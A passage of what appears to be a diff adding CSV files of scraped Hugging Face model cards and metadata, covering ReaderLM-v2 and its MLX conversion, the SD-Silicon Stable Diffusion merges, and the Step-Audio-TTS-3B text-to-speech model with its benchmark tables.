size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model.onnx_data', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_bnb4.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_fp16.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_fp16.onnx_data', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_int8.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_q4.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_q4f16.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_quantized.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_uint8.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": 
[""KBaba7/Quant"", ""bhaskartripathi/LLM_Quantization"", ""totolook/Quant"", ""FallnAI/Quantize-HF-Models"", ""ruslanmv/convert_to_gguf"", ""Felguk/ReaderLM-v2"", ""Nymbo/Markdown-Studio"", ""kevcx2/jinaai-ReaderLM-v2"", ""K00B404/LLM_Quantization"", ""Alun6666/jinaai-ReaderLM-v2"", ""agideia/jinaai-ReaderLM-v2""], ""safetensors"": {""parameters"": {""BF16"": 1543714304}, ""total"": 1543714304}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-04 06:52:36+00:00"", ""cardData"": ""language:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ninference: false"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""67847e071ceb7569fc09eb5f"", ""modelId"": ""jinaai/ReaderLM-v2"", ""usedStorage"": 31852785268}",0,https://huggingface.co/alexgusevski/ReaderLM-v2-mlx,1,,0,"https://huggingface.co/mlx-community/jinaai-ReaderLM-v2, https://huggingface.co/fdgsgqaegt/ReaderLM-v2-Q4_K_M-GGUF, https://huggingface.co/Svngoku/ReaderLM-v2-Q8_0-GGUF, https://huggingface.co/mradermacher/ReaderLM-v2-GGUF, https://huggingface.co/adriabama06/ReaderLM-v2-AWQ, https://huggingface.co/adriabama06/ReaderLM-v2-GPTQ-8bit, https://huggingface.co/Emm9625/ReaderLM-v2-Q3_K_L-GGUF, https://huggingface.co/Emm9625/ReaderLM-v2-Q6_K-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q2_K-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q3_K_S-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q3_K_M-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q3_K_L-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q4_0-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q4_K_S-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q4_K_M-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q5_0-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q5_K_S-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q5_K_M-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q6_K-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q8_0-GGUF, https://huggingface.co/yasserrmd/ReaderLM-v2-gguf, https://huggingface.co/ysn-rfd/ReaderLM-v2-Q8_0-GGUF, https://huggingface.co/DevQuasar/jinaai.ReaderLM-v2-GGUF, https://huggingface.co/mradermacher/ReaderLM-v2-i1-GGUF, https://huggingface.co/PrunaAI/jinaai-ReaderLM-v2-GGUF-smashed, https://huggingface.co/alexgusevski/ReaderLM-v2-q3-mlx, https://huggingface.co/alexgusevski/ReaderLM-v2-q4-mlx, https://huggingface.co/alexgusevski/ReaderLM-v2-q6-mlx, https://huggingface.co/alexgusevski/ReaderLM-v2-q8-mlx, https://huggingface.co/matrixportal/ReaderLM-v2-GGUF, https://huggingface.co/ysn-rfd/ReaderLM-v2-GGUF",31,"https://huggingface.co/kunal732/QwenReader, https://huggingface.co/kunal732/qwenreader-m2, https://huggingface.co/kunal732/qwenreader3, https://huggingface.co/kunal732/qwenreader4",4,"Alun6666/jinaai-ReaderLM-v2, FallnAI/Quantize-HF-Models, Felguk/ReaderLM-v2, K00B404/LLM_Quantization, KBaba7/Quant, Nymbo/Markdown-Studio, agideia/jinaai-ReaderLM-v2, bhaskartripathi/LLM_Quantization, huggingface/InferenceSupport/discussions/new?title=jinaai/ReaderLM-v2&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bjinaai%2FReaderLM-v2%5D(%2Fjinaai%2FReaderLM-v2)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kevcx2/jinaai-ReaderLM-v2, 
ruslanmv/convert_to_gguf, totolook/Quant",12
|
| 266 |
+
alexgusevski/ReaderLM-v2-mlx,"---
|
| 267 |
+
pipeline_tag: text-generation
|
| 268 |
+
language:
|
| 269 |
+
- multilingual
|
| 270 |
+
inference: false
|
| 271 |
+
license: cc-by-nc-4.0
|
| 272 |
+
library_name: transformers
|
| 273 |
+
base_model: jinaai/ReaderLM-v2
|
| 274 |
+
tags:
|
| 275 |
+
- mlx
|
| 276 |
+
---
|
| 277 |
+
|
| 278 |
+
# alexgusevski/ReaderLM-v2-mlx
|
| 279 |
+
|
| 280 |
+
The Model [alexgusevski/ReaderLM-v2-mlx](https://huggingface.co/alexgusevski/ReaderLM-v2-mlx) was
|
| 281 |
+
converted to MLX format from [jinaai/ReaderLM-v2](https://huggingface.co/jinaai/ReaderLM-v2)
|
| 282 |
+
using mlx-lm version **0.21.4**.
|
| 283 |
+
|
| 284 |
+
## Use with mlx
|
| 285 |
+
|
| 286 |
+
```bash
|
| 287 |
+
pip install mlx-lm
|
| 288 |
+
```
|
| 289 |
+
|
| 290 |
+
```python
|
| 291 |
+
from mlx_lm import load, generate
|
| 292 |
+
|
| 293 |
+
model, tokenizer = load(""alexgusevski/ReaderLM-v2-mlx"")
|
| 294 |
+
|
| 295 |
+
prompt = ""hello""
|
| 296 |
+
|
| 297 |
+
if tokenizer.chat_template is not None:
|
| 298 |
+
messages = [{""role"": ""user"", ""content"": prompt}]
|
| 299 |
+
prompt = tokenizer.apply_chat_template(
|
| 300 |
+
messages, add_generation_prompt=True
|
| 301 |
+
)
|
| 302 |
+
|
| 303 |
+
response = generate(model, tokenizer, prompt=prompt, verbose=True)
|
| 304 |
+
```
|
| 305 |
+
","{""id"": ""alexgusevski/ReaderLM-v2-mlx"", ""author"": ""alexgusevski"", ""sha"": ""d4ec67dfcf82838a77aaa2e2e256316d6d3f5d54"", ""last_modified"": ""2025-02-24 18:14:25+00:00"", ""created_at"": ""2025-02-24 18:02:47+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 13, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""qwen2"", ""text-generation"", ""mlx"", ""conversational"", ""multilingual"", ""base_model:jinaai/ReaderLM-v2"", ""base_model:finetune:jinaai/ReaderLM-v2"", ""license:cc-by-nc-4.0"", ""autotrain_compatible"", ""text-generation-inference"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: jinaai/ReaderLM-v2\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ntags:\n- mlx\ninference: false"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Qwen2ForCausalLM""], ""model_type"": ""qwen2"", ""tokenizer_config"": {""bos_token"": null, ""chat_template"": ""{% for message in messages %}{% if loop.first and messages[0]['role'] != 'system' %}{{ '<|im_start|>system\nYou are an AI assistant developed by Jina AI.<|im_end|>\n' }}{% endif %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n' }}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": null}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 1543714304}, ""total"": 1543714304}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-24 18:14:25+00:00"", ""cardData"": ""base_model: jinaai/ReaderLM-v2\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ntags:\n- mlx\ninference: false"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""67bcb447efd8d2373026aa71"", ""modelId"": ""alexgusevski/ReaderLM-v2-mlx"", ""usedStorage"": 
3098888563}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=alexgusevski/ReaderLM-v2-mlx&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Balexgusevski%2FReaderLM-v2-mlx%5D(%2Falexgusevski%2FReaderLM-v2-mlx)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
SD-Silicon_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,90 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
Xynon/SD-Silicon,"---
|
| 3 |
+
license: creativeml-openrail-m
|
| 4 |
+
tags:
|
| 5 |
+
- stable-diffusion
|
| 6 |
+
- text-to-image
|
| 7 |
+
- safetensors
|
| 8 |
+
---
|
| 9 |
+
|
| 10 |
+
----
|
| 11 |
+
|
| 12 |
+
# SD-Silicon
|
| 13 |
+
|
| 14 |
+
SD-Silicon: A series of general-purpose models based on the experimental automerger, autoMBW.
|
| 15 |
+
|
| 16 |
+
A collaborative creation of Xerxemi#6423 & Xynon#7407.
|
| 17 |
+
|
| 18 |
+

|
| 19 |
+
|
| 20 |
+
All models listed have the WD1.3 VAE baked in. However, for the purposes of this model series, an external VAE is also recommended.
|
| 21 |
+
|
| 22 |
+
----
|
| 23 |
+
|
| 24 |
+
# Licence
|
| 25 |
+
|
| 26 |
+
This model is open access and available to all, with a CreativeML OpenRAIL-M license further specifying rights and usage. The CreativeML OpenRAIL License specifies:
|
| 27 |
+
1. You can't use the model to deliberately produce or share illegal or harmful outputs or content
|
| 28 |
+
2. The authors claim no rights over the outputs you generate; you are free to use them and are accountable for their use, which must not go against the provisions set in the license
|
| 29 |
+
3. You may re-distribute the weights and use the model commercially and/or as a service. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the CreativeML OpenRAIL-M with all your users (please read the license entirely and carefully). Please read the full license here: https://huggingface.co/spaces/CompVis/stable-diffusion-license
|
| 30 |
+
|
| 31 |
+
# Terms of use
|
| 32 |
+
|
| 33 |
+
- **Clearly indicate where modifications have been made.**
|
| 34 |
+
If you used it for merging, please state what steps you took to do so.
|
| 35 |
+
|
| 36 |
+
----
|
| 37 |
+
|
| 38 |
+
# --base models--
|
| 39 |
+
|
| 40 |
+
Silicon28: a.k.a. extestg4. The first autoMBW model to match or surpass the quality of manual merge-block-weight merges.
|
| 41 |
+
|
| 42 |
+
Silicon29: a.k.a. extesto4. A similar but much larger list of merges, based on the list for Silicon28. The first good model to be constructed on a semi-stabilized autoMBW codebase.
|
| 43 |
+
|
| 44 |
+
# --specialty models--
|
| 45 |
+
|
| 46 |
+
Silicon28-negzero: a.k.a. extestg4-negzero. A negatively finetuned version of Silicon28, trained for 10 epochs on a dataset of 3,990 images. Better at some things, worse at others.
|
| 47 |
+
|
| 48 |
+
Silicon29-dark: a.k.a. extesto4-dark. Silicon29, but merged with noise offset. Gives darker output than the original base.
|
| 49 |
+
|
| 50 |
+
# --future models--
|
| 51 |
+
|
| 52 |
+
More will be posted soon<sup>TM</sup>
|
| 53 |
+
|
| 54 |
+
----
|
| 55 |
+
|
| 56 |
+
# Recommended Settings
|
| 57 |
+
|
| 58 |
+
Sampler: DPM++ 2M
|
| 59 |
+
|
| 60 |
+
Steps: 42 + 42 | can probably go lower, I just run at this
|
| 61 |
+
|
| 62 |
+
Upscaler: Latent (bicubic antialiased)
|
| 63 |
+
|
| 64 |
+
Denoising: ~0.5 to ~0.6
|
| 65 |
+
|
| 66 |
+
CFG: 13
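For reference, here is a minimal sketch of how these settings might map onto a 🤗 `diffusers` pipeline, assuming a local copy of one of the checkpoints and a `diffusers` version with `from_single_file` support. The latent-upscale second pass (the 42 + 42 steps) is an AUTOMATIC1111 hires-fix feature and is not reproduced here, and the prompt is only a placeholder:

```python
from diffusers import StableDiffusionPipeline, DPMSolverMultistepScheduler

# Hypothetical local path to one of the checkpoints in this repo.
pipe = StableDiffusionPipeline.from_single_file('Silicon29/Silicon29.safetensors')
# DPM++ 2M corresponds to DPMSolverMultistepScheduler in diffusers.
pipe.scheduler = DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)
pipe = pipe.to('cuda')

image = pipe(
    'a photo of a mountain village at dusk',  # placeholder prompt
    num_inference_steps=42,
    guidance_scale=13,
).images[0]
image.save('silicon29.png')
```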
|
| 67 |
+
|
| 68 |
+
----
|
| 69 |
+
|
| 70 |
+
More comparisons here: https://medium.com/@media_97267/the-automated-stable-diffusion-checkpoint-merger-autombw-44f8dfd38871
|
| 71 |
+
|
| 72 |
+
Note: all comparison photos are pure Silicon29 with the latent bicubic antialiased upscaler.
|
| 73 |
+
|
| 74 |
+

|
| 75 |
+

|
| 76 |
+

|
| 77 |
+

|
| 78 |
+
|
| 79 |
+
----
|
| 80 |
+
|
| 81 |
+
# Q: Why is this named Silicon?
|
| 82 |
+
|
| 83 |
+
A: Silicon's atomic number is 14. This line of models was originally supposed to be the 14th experimental model in Xynon/models, a.k.a. experimental14a/b/c.
|
| 84 |
+
|
| 85 |
+
# Q: Where do I find the automerger used to make these models?
|
| 86 |
+
|
| 87 |
+
A: https://github.com/Xerxemi/sdweb-auto-MBW | preliminary article here: https://medium.com/@media_97267/the-automated-stable-diffusion-checkpoint-merger-autombw-44f8dfd38871
|
| 88 |
+
|
| 89 |
+
----
|
| 90 |
+
","{""id"": ""Xynon/SD-Silicon"", ""author"": ""Xynon"", ""sha"": ""248976c6a1b70526b9faebaa197ee04104bc56ef"", ""last_modified"": ""2023-02-28 07:21:59+00:00"", ""created_at"": ""2023-02-24 04:31:48+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 178, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""stable-diffusion"", ""text-to-image"", ""safetensors"", ""license:creativeml-openrail-m"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- safetensors"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon28/Silicon28-negzero.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon28/Silicon28.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon29/Silicon29-dark.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon29/Silicon29.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-02-28 07:21:59+00:00"", ""cardData"": ""license: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- safetensors"", ""transformersInfo"": null, ""_id"": ""63f83db4a6db61fe73691847"", ""modelId"": ""Xynon/SD-Silicon"", ""usedStorage"": 8530504377}",0,,0,,0,,0,,0,"CompVis/stable-diffusion-license, huggingface/InferenceSupport/discussions/new?title=Xynon/SD-Silicon&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BXynon%2FSD-Silicon%5D(%2FXynon%2FSD-Silicon)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
|
Step-Audio-TTS-3B_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,164 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
stepfun-ai/Step-Audio-TTS-3B,"---
|
| 3 |
+
license: apache-2.0
|
| 4 |
+
pipeline_tag: text-to-speech
|
| 5 |
+
---
|
| 6 |
+
# Step-Audio-TTS-3B
|
| 7 |
+
|
| 8 |
+
Step-Audio-TTS-3B represents the industry's first Text-to-Speech (TTS) model trained on a large-scale synthetic dataset utilizing the LLM-Chat paradigm. It has achieved SOTA Character Error Rate (CER) results on the SEED TTS Eval benchmark. The model supports multiple languages, a variety of emotional expressions, and diverse voice style controls. Notably, Step-Audio-TTS-3B is also the first TTS model in the industry capable of generating RAP and Humming, marking a significant advancement in the field of speech synthesis.
|
| 9 |
+
|
| 10 |
+
This repository provides the model weights for StepAudio-TTS-3B, which is a dual-codebook trained LLM (Large Language Model) for text-to-speech synthesis. Additionally, it includes a vocoder trained using the dual-codebook approach, as well as a specialized vocoder specifically optimized for humming generation. These resources collectively enable high-quality speech synthesis and humming capabilities, leveraging the advanced dual-codebook training methodology.
|
| 11 |
+
|
| 12 |
+
## Performance comparison of content consistency (CER/WER) between GLM-4-Voice and MinMo.
|
| 13 |
+
|
| 14 |
+
<table>
|
| 15 |
+
<thead>
|
| 16 |
+
<tr>
|
| 17 |
+
<th rowspan=""2"">Model</th>
|
| 18 |
+
<th style=""text-align:center"" colspan=""1"">test-zh</th>
|
| 19 |
+
<th style=""text-align:center"" colspan=""1"">test-en</th>
|
| 20 |
+
</tr>
|
| 21 |
+
<tr>
|
| 22 |
+
<th style=""text-align:center"">CER (%) ↓</th>
|
| 23 |
+
<th style=""text-align:center"">WER (%) ↓</th>
|
| 24 |
+
</tr>
|
| 25 |
+
</thead>
|
| 26 |
+
<tbody>
|
| 27 |
+
<tr>
|
| 28 |
+
<td>GLM-4-Voice</td>
|
| 29 |
+
<td style=""text-align:center"">2.19</td>
|
| 30 |
+
<td style=""text-align:center"">2.91</td>
|
| 31 |
+
</tr>
|
| 32 |
+
<tr>
|
| 33 |
+
<td>MinMo</td>
|
| 34 |
+
<td style=""text-align:center"">2.48</td>
|
| 35 |
+
<td style=""text-align:center"">2.90</td>
|
| 36 |
+
</tr>
|
| 37 |
+
<tr>
|
| 38 |
+
<td><strong>Step-Audio</strong></td>
|
| 39 |
+
<td style=""text-align:center""><strong>1.53</strong></td>
|
| 40 |
+
<td style=""text-align:center""><strong>2.71</strong></td>
|
| 41 |
+
</tr>
|
| 42 |
+
</tbody>
|
| 43 |
+
</table>
|
| 44 |
+
|
| 45 |
+
## Results of TTS Models on SEED Test Sets.
|
| 46 |
+
*StepAudio-TTS-3B-Single denotes a dual-codebook backbone with a single-codebook vocoder.*
|
| 47 |
+
|
| 48 |
+
<table>
|
| 49 |
+
<thead>
|
| 50 |
+
<tr>
|
| 51 |
+
<th rowspan=""2"">Model</th>
|
| 52 |
+
<th style=""text-align:center"" colspan=""2"">test-zh</th>
|
| 53 |
+
<th style=""text-align:center"" colspan=""2"">test-en</th>
|
| 54 |
+
</tr>
|
| 55 |
+
<tr>
|
| 56 |
+
<th style=""text-align:center"">CER (%) ↓</th>
|
| 57 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 58 |
+
<th style=""text-align:center"">WER (%) ↓</th>
|
| 59 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 60 |
+
</tr>
|
| 61 |
+
</thead>
|
| 62 |
+
<tbody>
|
| 63 |
+
<tr>
|
| 64 |
+
<td>FireRedTTS</td>
|
| 65 |
+
<td style=""text-align:center"">1.51</td>
|
| 66 |
+
<td style=""text-align:center"">0.630</td>
|
| 67 |
+
<td style=""text-align:center"">3.82</td>
|
| 68 |
+
<td style=""text-align:center"">0.460</td>
|
| 69 |
+
</tr>
|
| 70 |
+
<tr>
|
| 71 |
+
<td>MaskGCT</td>
|
| 72 |
+
<td style=""text-align:center"">2.27</td>
|
| 73 |
+
<td style=""text-align:center"">0.774</td>
|
| 74 |
+
<td style=""text-align:center"">2.62</td>
|
| 75 |
+
<td style=""text-align:center"">0.774</td>
|
| 76 |
+
</tr>
|
| 77 |
+
<tr>
|
| 78 |
+
<td>CosyVoice</td>
|
| 79 |
+
<td style=""text-align:center"">3.63</td>
|
| 80 |
+
<td style=""text-align:center"">0.775</td>
|
| 81 |
+
<td style=""text-align:center"">4.29</td>
|
| 82 |
+
<td style=""text-align:center"">0.699</td>
|
| 83 |
+
</tr>
|
| 84 |
+
<tr>
|
| 85 |
+
<td>CosyVoice 2</td>
|
| 86 |
+
<td style=""text-align:center"">1.45</td>
|
| 87 |
+
<td style=""text-align:center"">0.806</td>
|
| 88 |
+
<td style=""text-align:center"">2.57</td>
|
| 89 |
+
<td style=""text-align:center"">0.736</td>
|
| 90 |
+
</tr>
|
| 91 |
+
<tr>
|
| 92 |
+
<td>CosyVoice 2-S</td>
|
| 93 |
+
<td style=""text-align:center"">1.45</td>
|
| 94 |
+
<td style=""text-align:center"">0.812</td>
|
| 95 |
+
<td style=""text-align:center"">2.38</td>
|
| 96 |
+
<td style=""text-align:center"">0.743</td>
|
| 97 |
+
</tr>
|
| 98 |
+
<tr>
|
| 99 |
+
<td><strong>Step-Audio-TTS-3B-Single</strong></td>
|
| 100 |
+
<td style=""text-align:center"">1.37</td>
|
| 101 |
+
<td style=""text-align:center"">0.802</td>
|
| 102 |
+
<td style=""text-align:center"">2.52</td>
|
| 103 |
+
<td style=""text-align:center"">0.704</td>
|
| 104 |
+
</tr>
|
| 105 |
+
<tr>
|
| 106 |
+
<td><strong>Step-Audio-TTS-3B</strong></td>
|
| 107 |
+
<td style=""text-align:center""><strong>1.31</strong></td>
|
| 108 |
+
<td style=""text-align:center"">0.733</td>
|
| 109 |
+
<td style=""text-align:center""><strong>2.31</strong></td>
|
| 110 |
+
<td style=""text-align:center"">0.660</td>
|
| 111 |
+
</tr>
|
| 112 |
+
<tr>
|
| 113 |
+
<td><strong>Step-Audio-TTS</strong></td>
|
| 114 |
+
<td style=""text-align:center""><strong>1.17</strong></td>
|
| 115 |
+
<td style=""text-align:center"">0.73</td>
|
| 116 |
+
<td style=""text-align:center""><strong>2.0</strong></td>
|
| 117 |
+
<td style=""text-align:center"">0.660</td>
|
| 118 |
+
</tr>
|
| 119 |
+
</tbody>
|
| 120 |
+
</table>
|
| 121 |
+
|
| 122 |
+
## Performance comparison of Dual-codebook Resynthesis with CosyVoice.
|
| 123 |
+
|
| 124 |
+
<table>
|
| 125 |
+
<thead>
|
| 126 |
+
<tr>
|
| 127 |
+
<th style=""text-align:center"" rowspan=""2"">Token</th>
|
| 128 |
+
<th style=""text-align:center"" colspan=""2"">test-zh</th>
|
| 129 |
+
<th style=""text-align:center"" colspan=""2"">test-en</th>
|
| 130 |
+
</tr>
|
| 131 |
+
<tr>
|
| 132 |
+
<th style=""text-align:center"">CER (%) ↓</th>
|
| 133 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 134 |
+
<th style=""text-align:center"">WER (%) ↓</th>
|
| 135 |
+
<th style=""text-align:center"">SS ↑</th>
|
| 136 |
+
</tr>
|
| 137 |
+
</thead>
|
| 138 |
+
<tbody>
|
| 139 |
+
<tr>
|
| 140 |
+
<td style=""text-align:center"">Groundtruth</td>
|
| 141 |
+
<td style=""text-align:center"">0.972</td>
|
| 142 |
+
<td style=""text-align:center"">-</td>
|
| 143 |
+
<td style=""text-align:center"">2.156</td>
|
| 144 |
+
<td style=""text-align:center"">-</td>
|
| 145 |
+
</tr>
|
| 146 |
+
<tr>
|
| 147 |
+
<td style=""text-align:center"">CosyVoice</td>
|
| 148 |
+
<td style=""text-align:center"">2.857</td>
|
| 149 |
+
<td style=""text-align:center""><strong>0.849</strong></td>
|
| 150 |
+
<td style=""text-align:center"">4.519</td>
|
| 151 |
+
<td style=""text-align:center""><strong>0.807</strong></td>
|
| 152 |
+
</tr>
|
| 153 |
+
<tr>
|
| 154 |
+
<td style=""text-align:center"">Step-Audio-TTS-3B</td>
|
| 155 |
+
<td style=""text-align:center""><strong>2.192</strong></td>
|
| 156 |
+
<td style=""text-align:center"">0.784</td>
|
| 157 |
+
<td style=""text-align:center""><strong>3.585</strong></td>
|
| 158 |
+
<td style=""text-align:center"">0.742</td>
|
| 159 |
+
</tr>
|
| 160 |
+
</tbody>
|
| 161 |
+
</table>
|
| 162 |
+
|
| 163 |
+
# More information
|
| 164 |
+
For more information, please refer to our repository: [Step-Audio](https://github.com/stepfun-ai/Step-Audio).","{""id"": ""stepfun-ai/Step-Audio-TTS-3B"", ""author"": ""stepfun-ai"", ""sha"": ""9ddb7cb28b97bbfceb429f1a2567b30256b7137c"", ""last_modified"": ""2025-02-17 15:50:57+00:00"", ""created_at"": ""2025-02-13 14:49:26+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 277, ""downloads_all_time"": null, ""likes"": 182, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""onnx"", ""safetensors"", ""step1"", ""text-to-speech"", ""custom_code"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""text-to-speech"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: apache-2.0\npipeline_tag: text-to-speech"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Step1ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_step1.Step1Config"", ""AutoModelForCausalLM"": ""modeling_step1.Step1ForCausalLM""}, ""model_type"": ""step1"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/VERSION_Vq0206Vocoder_Sing_0106', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/campplus.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/cosyvoice.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/flow.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/hift.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz-Music/speech_tokenizer_v1.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/VERSION_Vq0206Vocoder_1202', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/campplus.onnx', size=None, 